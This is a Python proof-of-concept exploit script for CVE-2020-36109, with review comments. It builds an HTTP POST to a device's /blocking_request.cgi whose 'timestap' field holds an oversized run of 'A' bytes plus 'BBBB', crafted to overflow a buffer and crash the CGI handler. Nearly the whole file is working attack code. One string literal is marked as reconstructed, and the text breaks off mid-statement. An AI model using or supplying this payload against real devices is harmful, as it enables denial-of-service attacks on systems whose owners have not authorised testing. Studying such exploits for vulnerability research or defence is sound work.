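#!/usr/bin/env python3
"""Proof-of-concept request builder for CVE-2020-36109.

Builds an HTTP POST to ``/blocking_request.cgi`` whose ``timestap`` field
carries an oversized value (see ``dos()``) and provides a small response
reader (``recvuntil()``).  Only request construction and the reader are
visible in this chunk; the code that parses the command line and sends the
request continues past it.

Run this only against a device you are explicitly authorized to test: the
request is built to crash the target's CGI handler, not to probe it safely.
"""
import socket
import sys
import time

import hexdump  # third-party; unused in this chunk, presumably used further down

CVE = "CVE-2020-36109"
HOST = "127.0.0.1"
PORT = 80

# Length of the 'A' filler in the oversized ``timestap`` value: 0x1000 bytes
# minus a 0xc-byte prefix minus the encoded newline; "BBBB" is appended after
# it.  The 0x1000 figure suggests a 4096-byte buffer on the CGI side — TODO
# confirm against the target binary.
_FILL_LEN = 0x1000 - 0xc - 1


def recvuntil(s, timeout=5):
    """Read from socket ``s`` until the peer closes or ``timeout`` seconds pass.

    Returns ``(done, data)``: ``data`` is everything received, decoded as
    UTF-8 (undecodable bytes are replaced rather than raising), and ``done``
    is True only when ``data`` ends with the terminator built from
    ``check_lst`` below.  Any socket error other than a timeout propagates.
    """
    # NOTE(review): the first terminator element was mangled in the copy this
    # was reviewed from (a bare line break inside the literal); it is taken to
    # be "\n" here — confirm against the original script.
    check_lst = ["\n", "\x0a", ""]
    check_str = "{}\x0d\x0a".format("\x0d\x0a".join(check_lst))
    chunks = []
    try:
        s.settimeout(timeout)
        while True:
            chunk = s.recv(1024 * 8)
            if not chunk:  # peer closed the connection
                break
            chunks.append(chunk)
    except socket.timeout:
        # A quiet peer is expected here; return whatever arrived so far.
        pass
    # Decode once, after reassembly: decoding per chunk can split a multi-byte
    # sequence and raise UnicodeDecodeError on a binary or non-UTF-8 response.
    data = b"".join(chunks).decode("utf-8", errors="replace")
    done = data.endswith(check_str)
    return done, data


def header(host=None, port=None):
    """Return the request line and fixed headers of the PoC POST as a string.

    ``host``/``port`` default to the module-level HOST/PORT, read at call
    time so a later reassignment (e.g. from the command line) is honoured.
    The result carries no Content-Length and no terminating blank line;
    ``dos()`` adds both.
    """
    if host is None:
        host = HOST
    if port is None:
        port = PORT
    origin = "http://{}:{}".format(host, port)
    lines = [
        "POST /blocking_request.cgi HTTP/1.1",
        "Host: {}:{}".format(host, port),
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
        "Accept: */*",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate",
        "Connection: keep-alive",
        # Referer/Origin point at the target itself; presumably the CGI
        # expects same-origin requests — not verifiable from this script.
        "Referer: {}/".format(origin),
        "Sec-GPC: 1",
        "Origin: {}".format(origin),
        "Pragma: no-cache",
        "Cache-Control: no-cache",
    ]
    return "".join(line + "\r\n" for line in lines)


def dos(host=None, port=None):
    """Return the complete PoC request (headers plus body) as a string.

    The body is a form-encoded POST whose ``timestap`` field is a Unix
    timestamp one hour plus five seconds in the future, followed by an
    encoded newline, ``_FILL_LEN`` bytes of 'A' and a trailing ``BBBB``;
    ``mac`` is a single percent-encoded NUL.  The misspelt field name
    ``timestap`` is presumably what the target's CGI parses — do not
    "correct" it.
    """
    mac = "mac=%00"
    future = int(time.time()) + 3600 + 5
    timestap = "timestap={}%0a{}BBBB".format(future, "A" * _FILL_LEN)
    body = "interval=0&CName=whatever&{}&{}".format(timestap, mac)
    # Content-Length must be the byte length of the body.  The body is ASCII,
    # so this equals len(body); encoding makes the intent explicit.
    return (
        header(host, port)
        + "Content-Length: {}\r\n".format(len(body.encode("utf-8")))
        + "\r\n"
        + body
    )


# NOTE(review): sys.argv[1] is indexed without a length check, so running the
# script with no arguments raises IndexError before the usage text appears.
# The script continues past this chunk; the statement below is cut off here.
if sys.argv[1] == "-h" or sys.argv[1] == "--help" :
    print("# Example usage: 'python3 {}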